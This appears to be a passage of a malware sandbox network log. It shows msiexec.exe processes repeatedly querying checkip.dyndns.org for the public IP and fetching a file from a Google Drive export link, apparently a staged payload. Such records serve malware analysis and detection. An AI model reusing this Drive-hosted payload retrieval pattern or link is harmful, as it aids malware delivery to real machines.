Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 16:12:04.430615902 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 22, 2024 16:12:04.684355021 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:04 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8945eb6e12fb144144bad1e0d0bd2546
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49991 | 193.122.6.168 | 80 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:03.264094114 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:04.101454973 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:03 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 201d851d5a11b55bfd35a80e30d723d9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 16:12:04.104168892 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 22, 2024 16:12:04.358023882 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:04 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 634701a1091a66dc74091b338babe520
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>
Oct 22, 2024 16:12:05.786778927 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Oct 22, 2024 16:12:06.034399986 CEST323INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:05 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 106
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 3f1fe45101646dea29c32ebf66f89733
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49995 | 193.122.6.168 | 80 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:05.590776920 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 22, 2024 16:12:06.422159910 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:06 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4592320010c418da7fd30fbdb28d3dec
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49998 | 193.122.6.168 | 80 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:06.814937115 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 22, 2024 16:12:07.657674074 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:07 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e781574b5f1fddd47bdecb1fb2330c23
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49999 | 193.122.6.168 | 80 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:07.201246977 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 22, 2024 16:12:08.049173117 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:07 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1700365627a90db359b2b106bb4af8d0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 50002 | 193.122.6.168 | 80 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:08.517466068 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:09.359898090 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:09 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9c2bdfb57dfca1ae22fd29f98860d2a4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 50003 | 193.122.6.168 | 80 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:08.958656073 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:09.804703951 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:09 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3fbecf5b71f0e0c814cf61e8d4c39eb0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 50006 | 193.122.6.168 | 80 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:10.129796982 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:10.967521906 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:10 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e01735d69b764cc933b85bb4dfec8bc9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 50007 | 193.122.6.168 | 80 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:10.567869902 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:11.393496037 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:11 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1f10f999a760dfdc2a327fb32cc8c303
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 50010 | 193.122.6.168 | 80 | 3212 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:11.756087065 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:12.685612917 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:12 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f2c0ae292c1a07e6bce36907425f86d2
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 50011 | 193.122.6.168 | 80 | 4460 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:12.179974079 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:13.069917917 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:12 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9eaed1db9a340926f50184cf09f931b8
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 50014 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:13.458158016 CEST | 151 bytes | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:14.301712990 CEST | 323 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:14 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d823252e31585c91ee001752878411b9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 50015 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:14.157345057 CEST | 151 bytes | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:14.993833065 CEST | 323 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:14 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 38ef3118ee9d6f5ee91d5d8d8fd32f81
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 50018 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:15.115284920 CEST | 151 bytes | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:15.965929985 CEST | 323 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:15 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7b48254484918812e28a9d371cb006c1
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 50019 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:15.772387028 CEST | 151 bytes | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:16.603888988 CEST | 323 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:16 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 25bc62aeeff2d5c7e97c17d386c99ee8
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 50022 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:12:16.793247938 CEST | 151 bytes | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 22, 2024 16:12:17.629726887 CEST | 323 bytes | IN
HTTP/1.1 200 OK
Date: Tue, 22 Oct 2024 14:12:17 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5d1e89c9fa98e182fa247fe9dd081283
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


Session ID: 0 | Source IP: 192.168.2.6 | Source Port: 49987 | Destination IP: 142.250.184.238 | Destination Port: 443 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:11:53 UTC | 216 bytes | OUT
GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2024-10-22 14:11:53 UTC | 1610 bytes | IN
HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 22 Oct 2024 14:11:53 GMT
Location: https://drive.usercontent.google.com/download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-CrCsR-vUT2oS4VqfoTCeyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49986 | Destination IP: 142.250.184.238 | Destination Port: 443 | PID: 3212 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:11:53 UTC | 216 bytes | OUT
GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2024-10-22 14:11:53 UTC | 1610 bytes | IN
HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 22 Oct 2024 14:11:53 GMT
Location: https://drive.usercontent.google.com/download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'nonce-KombpatoenzcCRumVarSnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49988 | Destination IP: 142.250.185.65 | Destination Port: 443 | PID: 4460 | Process: C:\Windows\SysWOW64\msiexec.exe
